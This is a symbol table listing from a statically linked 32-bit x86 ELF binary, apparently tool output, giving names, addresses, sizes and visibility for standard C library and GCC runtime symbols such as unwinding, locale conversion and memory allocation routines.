_L_unlock_867	.symtab	0x8052323	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_892	.symtab	0x8052f99	14	FUNC	<unknown>	DEFAULT	3
_L_unlock_904	.symtab	0x8076c35	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_925	.symtab	0x806e645	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_97	.symtab	0x806bb36	9	FUNC	<unknown>	DEFAULT	3
_L_unlock_978	.symtab	0x805e549	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_98	.symtab	0x8055916	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_98	.symtab	0x808412c	12	FUNC	<unknown>	DEFAULT	3
_Unwind_Backtrace	.symtab	0x80af0d0	213	FUNC	<unknown>	HIDDEN	3
_Unwind_DeleteException	.symtab	0x80ad540	31	FUNC	<unknown>	HIDDEN	3
_Unwind_FindEnclosingFunction	.symtab	0x80ad800	55	FUNC	<unknown>	HIDDEN	3
_Unwind_Find_FDE	.symtab	0x80b0b90	475	FUNC	<unknown>	HIDDEN	3
_Unwind_ForcedUnwind	.symtab	0x80af710	265	FUNC	<unknown>	HIDDEN	3
_Unwind_ForcedUnwind_Phase2	.symtab	0x80af410	257	FUNC	<unknown>	DEFAULT	3
_Unwind_GetCFA	.symtab	0x80ad4d0	11	FUNC	<unknown>	HIDDEN	3
_Unwind_GetDataRelBase	.symtab	0x80ad520	11	FUNC	<unknown>	HIDDEN	3
_Unwind_GetGR	.symtab	0x80ad5d0	101	FUNC	<unknown>	HIDDEN	3
_Unwind_GetIP	.symtab	0x80ad4e0	11	FUNC	<unknown>	HIDDEN	3
_Unwind_GetIPInfo	.symtab	0x80addf0	22	FUNC	<unknown>	HIDDEN	3
_Unwind_GetLanguageSpecificData	.symtab	0x80ad500	11	FUNC	<unknown>	HIDDEN	3
_Unwind_GetRegionStart	.symtab	0x80ad510	11	FUNC	<unknown>	HIDDEN	3
_Unwind_GetTextRelBase	.symtab	0x80ad530	11	FUNC	<unknown>	HIDDEN	3
_Unwind_IteratePhdrCallback	.symtab	0x80b0d70	1309	FUNC	<unknown>	DEFAULT	3
_Unwind_RaiseException	.symtab	0x80af270	407	FUNC	<unknown>	HIDDEN	3
_Unwind_RaiseException_Phase2	.symtab	0x80af1b0	188	FUNC	<unknown>	DEFAULT	3
_Unwind_Resume	.symtab	0x80af620	233	FUNC	<unknown>	HIDDEN	3
_Unwind_Resume_or_Rethrow	.symtab	0x80af520	249	FUNC	<unknown>	HIDDEN	3
_Unwind_SetGR	.symtab	0x80ad560	106	FUNC	<unknown>	HIDDEN	3
_Unwind_SetIP	.symtab	0x80ad4f0	14	FUNC	<unknown>	HIDDEN	3
__CTOR_END__	.symtab	0x80cf124	0	OBJECT	<unknown>	DEFAULT	15
__CTOR_LIST__	.symtab	0x80cf120	0	OBJECT	<unknown>	DEFAULT	15
__DTOR_END__	.symtab	0x80cf130	0	OBJECT	<unknown>	HIDDEN	16
__DTOR_LIST__	.symtab	0x80cf128	0	OBJECT	<unknown>	DEFAULT	16
__EH_FRAME_BEGIN__	.symtab	0x80c7efc	0	OBJECT	<unknown>	DEFAULT	11
__FRAME_END__	.symtab	0x80cdfec	0	OBJECT	<unknown>	DEFAULT	11
__JCR_END__	.symtab	0x80cf134	0	OBJECT	<unknown>	DEFAULT	17
__JCR_LIST__	.symtab	0x80cf134	0	OBJECT	<unknown>	DEFAULT	17
____strtod_l_internal	.symtab	0x80a5fb0	8404	FUNC	<unknown>	DEFAULT	3
____strtof_l_internal	.symtab	0x80a3d70	7471	FUNC	<unknown>	DEFAULT	3
____strtol_l_internal	.symtab	0x8056ab0	1065	FUNC	<unknown>	DEFAULT	3
____strtold_l_internal	.symtab	0x80a8590	8391	FUNC	<unknown>	DEFAULT	3
____strtoll_l_internal	.symtab	0x8056f10	1511	FUNC	<unknown>	DEFAULT	3
____strtoul_l_internal	.symtab	0x8079050	1026	FUNC	<unknown>	DEFAULT	3
____strtoull_l_internal	.symtab	0x80a31f0	1474	FUNC	<unknown>	DEFAULT	3
___asprintf	.symtab	0x80aa850	36	FUNC	<unknown>	DEFAULT	3
___brk_addr	.symtab	0x80d5a80	4	OBJECT	<unknown>	DEFAULT	22
___fxstat64	.symtab	0x8068d20	54	FUNC	<unknown>	DEFAULT	3
___newselect_nocancel	.symtab	0x806917a	45	FUNC	<unknown>	DEFAULT	3
___printf_fp	.symtab	0x807f620	9363	FUNC	<unknown>	DEFAULT	3
___vfprintf_chk	.symtab	0x806ba40	234	FUNC	<unknown>	DEFAULT	3
___vfscanf	.symtab	0x809e4d0	41	FUNC	<unknown>	DEFAULT	3
___xstat64	.symtab	0x8068ce0	54	FUNC	<unknown>	DEFAULT	3
__access	.symtab	0x808b590	31	FUNC	<unknown>	DEFAULT	3
__add_to_environ	.symtab	0x8055aa0	867	FUNC	<unknown>	DEFAULT	3
__after_morecore_hook	.symtab	0x80d4b48	4	OBJECT	<unknown>	DEFAULT	22
__alloc_dir	.symtab	0x80671b0	227	FUNC	<unknown>	DEFAULT	3
__argz_add_sep	.symtab	0x80863f0	150	FUNC	<unknown>	DEFAULT	3
__argz_count	.symtab	0x80862b0	53	FUNC	<unknown>	DEFAULT	3
__argz_create_sep	.symtab	0x80862f0	175	FUNC	<unknown>	DEFAULT	3
__argz_stringify	.symtab	0x80863a0	76	FUNC	<unknown>	DEFAULT	3
__asprintf	.symtab	0x80aa850	36	FUNC	<unknown>	DEFAULT	3
__atomic_writev_replacement	.symtab	0x808b820	345	FUNC	<unknown>	DEFAULT	3
__backtrace	.symtab	0x806b700	211	FUNC	<unknown>	DEFAULT	3
__backtrace_symbols_fd	.symtab	0x806b860	465	FUNC	<unknown>	DEFAULT	3
__brk	.symtab	0x808b7e0	56	FUNC	<unknown>	DEFAULT	3
__bsd_signal	.symtab	0x8055400	201	FUNC	<unknown>	DEFAULT	3
__bss_start	.symtab	0x80cfcc0	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__calloc	.symtab	0x80639e0	842	FUNC	<unknown>	DEFAULT	3
__cfree	.symtab	0x8065320	410	FUNC	<unknown>	DEFAULT	3
__chdir	.symtab	0x808b5d0	27	FUNC	<unknown>	DEFAULT	3
__clearenv	.symtab	0x8055940	112	FUNC	<unknown>	DEFAULT	3
__clone	.symtab	0x806acb0	119	FUNC	<unknown>	DEFAULT	3
__close	.symtab	0x8053ad0	80	FUNC	<unknown>	DEFAULT	3
__close_nocancel	.symtab	0x8053ada	27	FUNC	<unknown>	DEFAULT	3
__closedir	.symtab	0x8067380	67	FUNC	<unknown>	DEFAULT	3
__connect	.symtab	0x8053c30	87	FUNC	<unknown>	DEFAULT	3
__connect_internal	.symtab	0x8053c30	87	FUNC	<unknown>	DEFAULT	3
__correctly_grouped_prefixmb	.symtab	0x8057b20	589	FUNC	<unknown>	DEFAULT	3
__ctype_b_loc	.symtab	0x8055260	50	FUNC	<unknown>	DEFAULT	3
__ctype_tolower_loc	.symtab	0x80551e0	50	FUNC	<unknown>	DEFAULT	3
__ctype_toupper_loc	.symtab	0x8055220	50	FUNC	<unknown>	DEFAULT	3
__curbrk	.symtab	0x80d5a80	4	OBJECT	<unknown>	DEFAULT	22
__current_locale_name	.symtab	0x80a3150	27	FUNC	<unknown>	DEFAULT	3
__cxa_atexit	.symtab	0x8056120	311	FUNC	<unknown>	DEFAULT	3
__data_start	.symtab	0x80cf180	0	NOTYPE	<unknown>	DEFAULT	21
__daylight	.symtab	0x80d59e0	4	OBJECT	<unknown>	DEFAULT	22
__dcgettext	.symtab	0x8095040	57	FUNC	<unknown>	DEFAULT	3
__dcigettext	.symtab	0x8095cc0	1962	FUNC	<unknown>	DEFAULT	3
__deallocate_stack	.symtab	0x8051320	325	FUNC	<unknown>	DEFAULT	3
__default_morecore	.symtab	0x8065ea0	34	FUNC	<unknown>	DEFAULT	3
__default_stacksize	.symtab	0x80cf50c	4	OBJECT	<unknown>	DEFAULT	21
__deregister_frame	.symtab	0x80b0890	49	FUNC	<unknown>	HIDDEN	3
__deregister_frame_info	.symtab	0x80b0870	19	FUNC	<unknown>	HIDDEN	3
__deregister_frame_info_bases	.symtab	0x80b0780	233	FUNC	<unknown>	HIDDEN	3
__dl_iterate_phdr	.symtab	0x80b16e0	239	FUNC	<unknown>	DEFAULT	3
__dladdr	.symtab	0x809eb20	31	FUNC	<unknown>	DEFAULT	3
__dladdr1	.symtab	0x809eb40	86	FUNC	<unknown>	DEFAULT	3
__dlclose	.symtab	0x80aaaf0	25	FUNC	<unknown>	DEFAULT	3
__dlerror	.symtab	0x809e6a0	535	FUNC	<unknown>	DEFAULT	3
__dlinfo	.symtab	0x809eba0	52	FUNC	<unknown>	DEFAULT	3
__dlmopen	.symtab	0x809eca0	78	FUNC	<unknown>	DEFAULT	3
__dlopen	.symtab	0x80aa9f0	72	FUNC	<unknown>	DEFAULT	3
__dlsym	.symtab	0x80aab20	96	FUNC	<unknown>	DEFAULT	3
__dlvsym	.symtab	0x80aaba0	102	FUNC	<unknown>	DEFAULT	3
__do_global_ctors_aux	.symtab	0x80b18c0	0	FUNC	<unknown>	DEFAULT	3
__do_global_dtors_aux	.symtab	0x8048160	0	FUNC	<unknown>	DEFAULT	3
__dprintf	.symtab	0x8083360	36	FUNC	<unknown>	DEFAULT	3
__dso_handle	.symtab	0x80b2b08	0	OBJECT	<unknown>	HIDDEN	7
__dup2	.symtab	0x808b5b0	31	FUNC	<unknown>	DEFAULT	3
__elf_set___libc_atexit_element__IO_cleanup__	.symtab	0x80c7ef0	4	OBJECT	<unknown>	DEFAULT	9
__elf_set___libc_subfreeres_element_buffer_free__	.symtab	0x80c7ec4	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ec0	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ec8	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ecc	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ed0	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ed4	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ed8	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7edc	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ee4	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7ee8	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7eec	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_res_thread_freeres__	.symtab	0x80c7ee0	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_thread_subfreeres_element_arena_thread_freeres__	.symtab	0x80c7ef4	4	OBJECT	<unknown>	DEFAULT	10
__elf_set___libc_thread_subfreeres_element_res_thread_freeres__	.symtab	0x80c7ef8	4	OBJECT	<unknown>	DEFAULT	10
__environ	.symtab	0x80d5034	4	OBJECT	<unknown>	DEFAULT	22
__errno_location	.symtab	0x8054290	17	FUNC	<unknown>	DEFAULT	3
__execve	.symtab	0x8067a40	57	FUNC	<unknown>	DEFAULT	3
__exit_funcs	.symtab	0x80cf514	4	OBJECT	<unknown>	DEFAULT	21
__exit_thread	.symtab	0x8068c00	26	FUNC	<unknown>	DEFAULT	3
__fcloseall	.symtab	0x8059ac0	9	FUNC	<unknown>	DEFAULT	3
__fcntl	.symtab	0x8053b70	177	FUNC	<unknown>	DEFAULT	3
__fcntl_nocancel	.symtab	0x8053b20	69	FUNC	<unknown>	DEFAULT	3
__find_in_stack_list	.symtab	0x80508f0	131	FUNC	<unknown>	DEFAULT	3
__find_specmb	.symtab	0x8083400	117	FUNC	<unknown>	DEFAULT	3
__fini_array_end	.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__fini_array_start	.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__fopen_internal	.symtab	0x80581c0	218	FUNC	<unknown>	DEFAULT	3
__fopen_maybe_mmap	.symtab	0x8058180	63	FUNC	<unknown>	DEFAULT	3
__fork	.symtab	0x8054280	9	FUNC	<unknown>	DEFAULT	3
__fork_generation	.symtab	0x80d617c	4	OBJECT	<unknown>	DEFAULT	22
__fork_generation_pointer	.symtab	0x80d6248	4	OBJECT	<unknown>	DEFAULT	22
__fork_handlers	.symtab	0x80d624c	4	OBJECT	<unknown>	DEFAULT	22
__fork_lock	.symtab	0x80d50e0	4	OBJECT	<unknown>	DEFAULT	22
__fprintf	.symtab	0x8083330	36	FUNC	<unknown>	DEFAULT	3
__fpu_control	.symtab	0x80cfc58	2	OBJECT	<unknown>	DEFAULT	21
__frame_state_for	.symtab	0x80ae290	298	FUNC	<unknown>	HIDDEN	3
__free	.symtab	0x8065320	410	FUNC	<unknown>	DEFAULT	3
__free_hook	.symtab	0x80d4b44	4	OBJECT	<unknown>	DEFAULT	22
__free_stack_cache	.symtab	0x8050aa0	157	FUNC	<unknown>	DEFAULT	3
__free_tcb	.symtab	0x8051470	70	FUNC	<unknown>	DEFAULT	3
__fsetlocking	.symtab	0x8085ce0	56	FUNC	<unknown>	DEFAULT	3
__funlockfile	.symtab	0x80833c0	47	FUNC	<unknown>	DEFAULT	3
__fxstat64	.symtab	0x8068d20	54	FUNC	<unknown>	DEFAULT	3
__gcc_personality_v0	.symtab	0x80b14b0	538	FUNC	<unknown>	HIDDEN	3
__gconv	.symtab	0x80a2fe0	354	FUNC	<unknown>	DEFAULT	3
__gconv_alias_compare	.symtab	0x806cca0	25	FUNC	<unknown>	DEFAULT	3
__gconv_alias_db	.symtab	0x80d6318	4	OBJECT	<unknown>	DEFAULT	22
__gconv_btwoc_ascii	.symtab	0x806e830	17	FUNC	<unknown>	DEFAULT	3
__gconv_close	.symtab	0x8094890	145	FUNC	<unknown>	DEFAULT	3
__gconv_close_transform	.symtab	0x806ce00	181	FUNC	<unknown>	DEFAULT	3
__gconv_compare_alias	.symtab	0x806cd20	219	FUNC	<unknown>	DEFAULT	3
__gconv_compare_alias_cache	.symtab	0x80731e0	413	FUNC	<unknown>	DEFAULT	3
__gconv_find_shlib	.symtab	0x8073900	397	FUNC	<unknown>	DEFAULT	3
__gconv_find_transform	.symtab	0x806d7b0	564	FUNC	<unknown>	DEFAULT	3
__gconv_get_alias_db	.symtab	0x806cc40	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_builtin_trans	.symtab	0x806e660	450	FUNC	<unknown>	DEFAULT	3
__gconv_get_cache	.symtab	0x8072ee0	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_modules_db	.symtab	0x806cc30	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_path	.symtab	0x806df30	730	FUNC	<unknown>	DEFAULT	3
__gconv_load_cache	.symtab	0x8073000	479	FUNC	<unknown>	DEFAULT	3
__gconv_lock	.symtab	0x80d6314	4	OBJECT	<unknown>	DEFAULT	22
__gconv_lookup_cache	.symtab	0x8073380	1216	FUNC	<unknown>	DEFAULT	3
__gconv_max_path_elem_len	.symtab	0x80d6320	4	OBJECT	<unknown>	DEFAULT	22
__gconv_modules_db	.symtab	0x80d6310	4	OBJECT	<unknown>	DEFAULT	22
__gconv_open	.symtab	0x80a28e0	1786	FUNC	<unknown>	DEFAULT	3
__gconv_path_elem	.symtab	0x80d6324	4	OBJECT	<unknown>	DEFAULT	22
__gconv_path_envvar	.symtab	0x80d631c	4	OBJECT	<unknown>	DEFAULT	22
__gconv_read_conf	.symtab	0x806e210	1061	FUNC	<unknown>	DEFAULT	3
__gconv_release_cache	.symtab	0x8072ef0	26	FUNC	<unknown>	DEFAULT	3
__gconv_release_shlib	.symtab	0x80738b0	34	FUNC	<unknown>	DEFAULT	3
__gconv_release_step	.symtab	0x806ccc0	85	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ascii_internal	.symtab	0x806fa60	891	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ascii	.symtab	0x806f430	1573	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs2	.symtab	0x806e850	1688	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs2reverse	.symtab	0x8070240	1693	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs4	.symtab	0x80712d0	895	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs4le	.symtab	0x8071650	879	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_utf8	.symtab	0x8072680	2138	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs2_internal	.symtab	0x806eef0	1343	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs2reverse_internal	.symtab	0x80708e0	1374	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs4_internal	.symtab	0x8070e40	1164	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs4le_internal	.symtab	0x806fde0	1111	FUNC	<unknown>	DEFAULT	3
__gconv_transform_utf8_internal	.symtab	0x80719c0	3253	FUNC	<unknown>	DEFAULT	3
__gconv_translit_find	.symtab	0x8094a20	610	FUNC	<unknown>	DEFAULT	3
__gconv_transliterate	.symtab	0x8094cb0	873	FUNC	<unknown>	DEFAULT	3
__get_avphys_pages	.symtab	0x806a8a0	14	FUNC	<unknown>	DEFAULT	3
__get_nprocs	.symtab	0x806aaf0	323	FUNC	<unknown>	DEFAULT	3
__get_nprocs_conf	.symtab	0x806aaf0	323	FUNC	<unknown>	DEFAULT	3
__get_phys_pages	.symtab	0x806a8b0	14	FUNC	<unknown>	DEFAULT	3
__getclktck	.symtab	0x806ac40	20	FUNC	<unknown>	DEFAULT	3
__getcwd	.symtab	0x808b5f0	234	FUNC	<unknown>	DEFAULT	3
__getdelim	.symtab	0x8083eb0	624	FUNC	<unknown>	DEFAULT	3
__getdents	.symtab	0x80674a0	159	FUNC	<unknown>	DEFAULT	3
__getdtablesize	.symtab	0x8069140	41	FUNC	<unknown>	DEFAULT	3
__getegid	.symtab	0x808b560	12	FUNC	<unknown>	DEFAULT	3
__geteuid	.symtab	0x808b540	12	FUNC	<unknown>	DEFAULT	3
__getgid	.symtab	0x808b550	12	FUNC	<unknown>	DEFAULT	3
__gethostname	.symtab	0x809fcc0	140	FUNC	<unknown>	DEFAULT	3
__getpagesize	.symtab	0x8069120	23	FUNC	<unknown>	DEFAULT	3
__getpid	.symtab	0x8067ea0	49	FUNC	<unknown>	DEFAULT	3
__getrlimit	.symtab	0x8069030	54	FUNC	<unknown>	DEFAULT	3
__getsockname	.symtab	0x806ae00	30	FUNC	<unknown>	DEFAULT	3
__getsockopt	.symtab	0x806ae20	30	FUNC	<unknown>	DEFAULT	3
__gettext_extract_plural	.symtab	0x8078660	266	FUNC	<unknown>	DEFAULT	3
__gettext_free_exp	.symtab	0x8077ad0	523	FUNC	<unknown>	DEFAULT	3
__gettext_germanic_plural	.symtab	0x80c2248	20	OBJECT	<unknown>	DEFAULT	7
__gettextparse	.symtab	0x8077dd0	2186	FUNC	<unknown>	DEFAULT	3
__gettimeofday	.symtab	0x8067190	31	FUNC	<unknown>	DEFAULT	3
__gettimeofday_internal	.symtab	0x8067190	31	FUNC	<unknown>	DEFAULT	3
__getuid	.symtab	0x808b530	12	FUNC	<unknown>	DEFAULT	3
__gmon_start__	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__guess_grouping	.symtab	0x807f2a0	76	FUNC	<unknown>	DEFAULT	3
__hash_string	.symtab	0x8078770	59	FUNC	<unknown>	DEFAULT	3
__i686.get_pc_thunk.bx	.symtab	0x80af81d	0	FUNC	<unknown>	HIDDEN	3
__i686.get_pc_thunk.cx	.symtab	0x80af819	0	FUNC	<unknown>	HIDDEN	3
__inet_aton	.symtab	0x806b260	343	FUNC	<unknown>	DEFAULT	3
__init_array_end	.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__init_array_start	.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__init_misc	.symtab	0x806ac60	78	FUNC	<unknown>	DEFAULT	3
__init_sched_fifo_prio	.symtab	0x8053f80	42	FUNC	<unknown>	DEFAULT	3
__initstate	.symtab	0x8056370	112	FUNC	<unknown>	DEFAULT	3
__initstate_r	.symtab	0x8056780	545	FUNC	<unknown>	DEFAULT	3
__ioctl	.symtab	0x80690f0	33	FUNC	<unknown>	DEFAULT	3
__is_smp	.symtab	0x80d6190	4	OBJECT	<unknown>	DEFAULT	22
__isatty	.symtab	0x808b6e0	34	FUNC	<unknown>	DEFAULT	3
__isinf	.symtab	0x80964d0	64	FUNC	<unknown>	DEFAULT	3
__isinfl	.symtab	0x8096540	85	FUNC	<unknown>	DEFAULT	3
__isnan	.symtab	0x8096510	39	FUNC	<unknown>	DEFAULT	3
__isnanl	.symtab	0x80965a0	69	FUNC	<unknown>	DEFAULT	3
__kill	.symtab	0x8055560	31	FUNC	<unknown>	DEFAULT	3
__lchown	.symtab	0x8068d80	57	FUNC	<unknown>	DEFAULT	3
__libc_alloca_cutoff	.symtab	0x806b010	66	FUNC	<unknown>	DEFAULT	3
__libc_argc	.symtab	0x80d6308	4	OBJECT	<unknown>	DEFAULT	22
__libc_argv	.symtab	0x80d630c	4	OBJECT	<unknown>	DEFAULT	22
__libc_calloc	.symtab	0x80639e0	842	FUNC	<unknown>	DEFAULT	3
__libc_check_standard_fds	.symtab	0x8054cd0	459	FUNC	<unknown>	DEFAULT	3
__libc_cleanup_routine	.symtab	0x806b060	27	FUNC	<unknown>	DEFAULT	3
__libc_close	.symtab	0x8053ad0	80	FUNC	<unknown>	DEFAULT	3
__libc_connect	.symtab	0x8053c30	87	FUNC	<unknown>	DEFAULT	3
__libc_csu_fini	.symtab	0x8055120	57	FUNC	<unknown>	DEFAULT	3
__libc_csu_init	.symtab	0x8055160	127	FUNC	<unknown>	DEFAULT	3
__libc_disable_asynccancel	.symtab	0x806b080	50	FUNC	<unknown>	DEFAULT	3
__libc_dlclose	.symtab	0x80945c0	87	FUNC	<unknown>	DEFAULT	3
__libc_dlopen_mode	.symtab	0x8094700	226	FUNC	<unknown>	DEFAULT	3
__libc_dlsym	.symtab	0x8094620	108	FUNC	<unknown>	DEFAULT	3
__libc_dlsym_private	.symtab	0x8094690	108	FUNC	<unknown>	DEFAULT	3
__libc_enable_asynccancel	.symtab	0x806b0c0	98	FUNC	<unknown>	DEFAULT	3
__libc_enable_secure	.symtab	0x80cf140	4	OBJECT	<unknown>	DEFAULT	18
__libc_enable_secure_decided	.symtab	0x80d6304	4	OBJECT	<unknown>	DEFAULT	22
__libc_errno	.symtab	0x14	4	TLS	<unknown>	DEFAULT	14
__libc_fatal	.symtab	0x8059d90	42	FUNC	<unknown>	DEFAULT	3
__libc_fcntl	.symtab	0x8053b70	177	FUNC	<unknown>	DEFAULT	3
__libc_fork	.symtab	0x8067810	535	FUNC	<unknown>	DEFAULT	3
__libc_free	.symtab	0x8065320	410	FUNC	<unknown>	DEFAULT	3
__libc_init_first	.symtab	0x806cba0	133	FUNC	<unknown>	DEFAULT	3
__libc_init_secure	.symtab	0x806cb40	66	FUNC	<unknown>	DEFAULT	3
__libc_longjmp	.symtab	0x8055350	84	FUNC	<unknown>	DEFAULT	3
__libc_lseek	.symtab	0x8053d50	33	FUNC	<unknown>	DEFAULT	3
__libc_lseek64	.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__libc_mallinfo	.symtab	0x8060a60	353	FUNC	<unknown>	DEFAULT	3
__libc_malloc	.symtab	0x8063d30	442	FUNC	<unknown>	DEFAULT	3
__libc_malloc_initialized	.symtab	0x80cf9f8	4	OBJECT	<unknown>	DEFAULT	21
__libc_mallopt	.symtab	0x8061150	356	FUNC	<unknown>	DEFAULT	3
__libc_memalign	.symtab	0x8063ef0	467	FUNC	<unknown>	DEFAULT	3
__libc_message	.symtab	0x8059ad0	691	FUNC	<unknown>	DEFAULT	3
__libc_multiple_libcs	.symtab	0x80cfa4c	4	OBJECT	<unknown>	DEFAULT	21
__libc_nanosleep	.symtab	0x80677b0	87	FUNC	<unknown>	DEFAULT	3
__libc_open	.symtab	0x8053d80	91	FUNC	<unknown>	DEFAULT	3
__libc_pause	.symtab	0x8053de0	64	FUNC	<unknown>	DEFAULT	3
__libc_pthread_init	.symtab	0x806b230	45	FUNC	<unknown>	DEFAULT	3
__libc_pvalloc	.symtab	0x80630c0	469	FUNC	<unknown>	DEFAULT	3
__libc_read	.symtab	0x8053a70	91	FUNC	<unknown>	DEFAULT	3
__libc_realloc	.symtab	0x80654c0	1085	FUNC	<unknown>	DEFAULT	3
__libc_recvfrom	.symtab	0x8053c90	87	FUNC	<unknown>	DEFAULT	3
__libc_register_dl_open_hook	.symtab	0x80947f0	125	FUNC	<unknown>	DEFAULT	3
__libc_register_dlfcn_hook	.symtab	0x809e5b0	37	FUNC	<unknown>	DEFAULT	3
__libc_resp	.symtab	0x0	4	TLS	<unknown>	DEFAULT	13
__libc_select	.symtab	0x8069170	115	FUNC	<unknown>	DEFAULT	3
__libc_send	.symtab	0x806ae40	87	FUNC	<unknown>	DEFAULT	3
__libc_sendto	.symtab	0x8053cf0	87	FUNC	<unknown>	DEFAULT	3
__libc_setlocale_lock	.symtab	0x80d58a0	32	OBJECT	<unknown>	DEFAULT	22
__libc_setup_tls	.symtab	0x8054f00	505	FUNC	<unknown>	DEFAULT	3
__libc_sigaction	.symtab	0x8054730	298	FUNC	<unknown>	DEFAULT	3
__libc_siglongjmp	.symtab	0x8055350	84	FUNC	<unknown>	DEFAULT	3
__libc_stack_end	.symtab	0x80cf13c	4	OBJECT	<unknown>	DEFAULT	18
__libc_start_main	.symtab	0x80549b0	763	FUNC	<unknown>	DEFAULT	3
__libc_system	.symtab	0x8057a30	104	FUNC	<unknown>	DEFAULT	3
__libc_thread_freeres	.symtab	0x80b2980	33	FUNC	<unknown>	DEFAULT	5
__libc_tsd_CTYPE_B	.symtab	0x18	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_CTYPE_TOLOWER	.symtab	0x20	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_CTYPE_TOUPPER	.symtab	0x1c	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_LOCALE	.symtab	0x8	4	TLS	<unknown>	DEFAULT	13
__libc_tsd_MALLOC	.symtab	0x24	4	TLS	<unknown>	DEFAULT	14
__libc_valloc	.symtab	0x80632a0	467	FUNC	<unknown>	DEFAULT	3
__libc_waitpid	.symtab	0x8053e20	91	FUNC	<unknown>	DEFAULT	3
__libc_write	.symtab	0x8053a10	91	FUNC	<unknown>	DEFAULT	3
__libc_writev	.symtab	0x808b980	270	FUNC	<unknown>	DEFAULT	3
__libio_codecvt	.symtab	0x80c2e00	120	OBJECT	<unknown>	DEFAULT	7
__libio_translit	.symtab	0x80c2e78	20	OBJECT	<unknown>	DEFAULT	7
__lll_lock_wait	.symtab	0x8053730	48	FUNC	<unknown>	HIDDEN	3
__lll_lock_wait_private	.symtab	0x8053700	42	FUNC	<unknown>	HIDDEN	3
__lll_robust_lock_wait	.symtab	0x80538e0	81	FUNC	<unknown>	HIDDEN	3
__lll_robust_timedlock_wait	.symtab	0x8053940	201	FUNC	<unknown>	HIDDEN	3
__lll_timedlock_wait	.symtab	0x8053760	173	FUNC	<unknown>	HIDDEN	3
__lll_timedwait_tid	.symtab	0x8053870	112	FUNC	<unknown>	HIDDEN	3
__lll_unlock_wake	.symtab	0x8053840	43	FUNC	<unknown>	HIDDEN	3
__lll_unlock_wake_private	.symtab	0x8053810	37	FUNC	<unknown>	HIDDEN	3
__llseek	.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__localtime_r	.symtab	0x8086e00	34	FUNC	<unknown>	DEFAULT	3
__longjmp	.symtab	0x80553b0	43	FUNC	<unknown>	DEFAULT	3
__lseek	.symtab	0x8053d50	33	FUNC	<unknown>	DEFAULT	3
__lseek64	.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__make_stacks_executable	.symtab	0x8051210	257	FUNC	<unknown>	DEFAULT	3
__mallinfo	.symtab	0x8060a60	353	FUNC	<unknown>	DEFAULT	3
__malloc	.symtab	0x8063d30	442	FUNC	<unknown>	DEFAULT	3
__malloc_check_init	.symtab	0x8060000	121	FUNC	<unknown>	DEFAULT	3
__malloc_get_state	.symtab	0x8064180	428	FUNC	<unknown>	DEFAULT	3
__malloc_hook	.symtab	0x80cf9ec	4	OBJECT	<unknown>	DEFAULT	21
__malloc_initialize_hook	.symtab	0x80d4b40	4	OBJECT	<unknown>	DEFAULT	22
__malloc_set_state	.symtab	0x8060dc0	905	FUNC	<unknown>	DEFAULT	3
__malloc_stats	.symtab	0x8060840	529	FUNC	<unknown>	DEFAULT	3
__malloc_trim	.symtab	0x8060bd0	493	FUNC	<unknown>	DEFAULT	3
__malloc_usable_size	.symtab	0x805f010	52	FUNC	<unknown>	DEFAULT	3
__mallopt	.symtab	0x8061150	356	FUNC	<unknown>	DEFAULT	3
__mbrlen	.symtab	0x8086500	55	FUNC	<unknown>	DEFAULT	3
__mbrtowc	.symtab	0x8086540	407	FUNC	<unknown>	DEFAULT	3
__mbsnrtowcs	.symtab	0x8086ae0	594	FUNC	<unknown>	DEFAULT	3
__memalign	.symtab	0x8063ef0	467	FUNC	<unknown>	DEFAULT	3
__memalign_hook	.symtab	0x80cf9f4	4	OBJECT	<unknown>	DEFAULT	21
